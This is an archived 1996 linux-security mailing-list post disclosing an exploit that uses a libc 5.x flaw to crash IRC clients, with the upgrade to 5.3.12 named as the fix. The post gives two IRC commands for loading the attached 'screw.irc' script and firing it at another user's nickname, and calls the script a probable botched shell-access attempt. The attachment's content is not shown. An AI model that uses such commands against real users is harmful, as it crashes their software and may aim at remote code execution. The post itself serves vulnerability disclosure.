[712] in linux-security and linux-alert archive
[linux-security] Corrected post: Exploit for problem with libc >5.0.0 <5.3.9
daemon@ATHENA.MIT.EDU (lilo)
Thu May 9 17:44:55 1996
From: lilo <TaRDiS@mail.utexas.edu>
Date: Thu, 9 May 1996 11:49:57 -0500 (CDT)
To: Linux Security List <linux-security@tarsier.cv.nrao.edu>

Sorry, pine is a little bit stubborn at times. Here is the corrected
posting with the attachment.

I wish I had time to look into this more carefully. However, I've confirmed
that with no other code changes, an upgrade to libc 5.3.12 eliminates this
problem. So far I have heard of no security holes in 5.3.12 though that
could certainly change.

You can see by inspection this exploit is probably a botched attempt to get
shell access on the other user's client.

To use this exploit to segfault someone's vanilla 2.8.2+ client:

    /load screw.irc
    /libc <the-user's-IRC-nickname>

I'd appreciate it if anyone who troubles to look into this more deeply could
send me some detail on just what is going on, for my records. It segfaults
with an illegal instruction.

Thank you for your time.

lilo

Content-Type: TEXT/PLAIN; name="screw.irc"
Content-Transfer-Encoding: BASE64